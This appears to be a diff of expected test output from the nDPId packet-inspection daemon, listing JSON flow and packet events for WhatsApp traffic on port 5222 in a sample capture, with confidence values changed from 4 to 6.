+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074111508,"flow_last_seen":1655074111844,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45850,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655074681295,"flow_last_seen":1655074681757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655073402411,"flow_last_seen":1655073402833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655085445318,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":48538,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":466,"packets-processed":465,"total-skipped-flows":0,"total-l4-payload-len":38268,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":59,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":59,"total-idle-flows":53,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":391,"global_ts_msec":1655089030478} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655089030478,"flow_last_seen":1655089030478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655089030478,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1655089030478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655089030478,"pkt":"eJS0JASgYDjgxTWgCABFAAA8PU5AAD8GxPPAqAJkszzDMYAeFGbXqdzGAAAAAKAC\/\/+LPgAAAgQFtAQCCApJafDnAAAAAAEDAwg="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1655089030510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655089030510,"pkt":"eJS0JASgYDjgxTWgCABFAAA0PU9AAD8GxPrAqAJkszzDMYAeFGbXqdzHU7KHPoAQAVeFmQAAAQEICklp8QcyIyXX"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1655089030611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655089030611,"pkt":"eJS0JASgYDjgxTWgCABFAAA4PVBAAD8GxPXAqAJkszzDMYAeFGbXqdzHU7KHPoAYAVc\/4gAAAQEICklp8W0yIyXXRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655089030478,"flow_last_seen":1655089030643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655089030643,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655078415178,"flow_last_seen":1655078415507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079015860,"flow_last_seen":1655079016137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079242727,"flow_last_seen":1655079242898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655078417966,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655089030478,"flow_last_seen":1655089030643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655089030643,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":32798,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655078415178,"flow_last_seen":1655078415507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079015860,"flow_last_seen":1655079016137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46768,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655079242727,"flow_last_seen":1655079242898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45130,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655078417966,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655089030857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":474,"packets-processed":473,"total-skipped-flows":0,"total-l4-payload-len":38585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":60,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":60,"total-idle-flows":58,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":402,"global_ts_msec":1655090233457} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655090233457,"flow_last_seen":1655090233457,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655090233457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1655090233457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655090233457,"pkt":"eJS0JASgYDjgxTWgCABFAAA8YMVAAD8GoXzAqAJkszzDMbfuFGYjjxw1AAAAAKAC\/\/8ccQAAAgQFtAQCCArHvx46AAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1655090233489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655090233489,"pkt":"eJS0JASgYDjgxTWgCABFAAA0YMZAAD8GoYPAqAJkszzDMbfuFGYjjxw2tsj\/nIAQAKzs8QAAAQEICse\/HlqH9x8U"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1655090233571,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655090233571,"pkt":"eJS0JASgYDjgxTWgCABFAAA4YMdAAD8GoX7AqAJkszzDMbfuFGYjjxw2tsj\/nIAYAKynTQAAAQEICse\/Hq2H9x8URUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655090233457,"flow_last_seen":1655090233603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655090233603,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655090233457,"flow_last_seen":1655090233603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655090233603,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47086,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":482,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":482,"packets-processed":481,"total-skipped-flows":0,"total-l4-payload-len":38908,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":61,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":61,"total-idle-flows":58,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":408,"global_ts_msec":1655091294583} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655091294583,"flow_last_seen":1655091294583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655091294583,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1655091294583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655091294583,"pkt":"eJS0JASgYDjgxTWgCABFAAA8\/r9AAD8GA4LAqAJkszzDMcAeFGacobJEAAAAAKAC\/\/\/yvwAAAgQFtAQCCApxiYbPAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1655091294836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655091294836,"pkt":"eJS0JASgYDjgxTWgCABFAAA0\/sBAAD8GA4nAqAJkszzDMcAeFGacobJFhNtvm4AQAIBe2QAAAQEICnGJh9AM9r+2"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1655091294836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655091294836,"pkt":"eJS0JASgYDjgxTWgCABFAAA4\/sFAAD8GA4TAqAJkszzDMcAeFGacobJFhNtvm4AYAIAZggAAAQEICnGJh9YM9r+2RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655091294583,"flow_last_seen":1655091294939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655091294939,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655091294583,"flow_last_seen":1655091294939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655091294939,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49182,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":489,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":489,"packets-processed":488,"total-skipped-flows":0,"total-l4-payload-len":39230,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":62,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":62,"total-idle-flows":58,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":414,"global_ts_msec":1655096063383} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655096063383,"flow_last_seen":1655096063383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655096063383,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1655096063383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655096063383,"pkt":"eJS0JASgYDjgxTWgCABFAAA80GdAAD8GMdrAqAJkszzDMcBQFGYzpQPcAAAAAKAC\/\/+30QAAAgQFtAQCCApxjNjtAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1655096063418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655096063418,"pkt":"eJS0JASgYDjgxTWgCABFAAA00GhAAD8GMeHAqAJkszzDMcBQFGYzpQPdMmkwzoAQAIAjpQAAAQEICnGM2RDAwp5N"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1655096063425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655096063425,"pkt":"eJS0JASgYDjgxTWgCABFAAA40GlAAD8GMdzAqAJkszzDMcBQFGYzpQPdMmkwzoAYAIDeTAAAAQEICnGM2RfAwp5NRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655096063383,"flow_last_seen":1655096063459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655096063459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655085444940,"flow_last_seen":1655085445318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655096063826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655096063383,"flow_last_seen":1655096063459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655096063459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49232,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655085444940,"flow_last_seen":1655085445318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655096063826,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":60328,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":497,"packets-processed":496,"total-skipped-flows":0,"total-l4-payload-len":39512,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":63,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":63,"total-idle-flows":59,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":421,"global_ts_msec":1655097851208} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655097851208,"flow_last_seen":1655097851208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655097851208,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 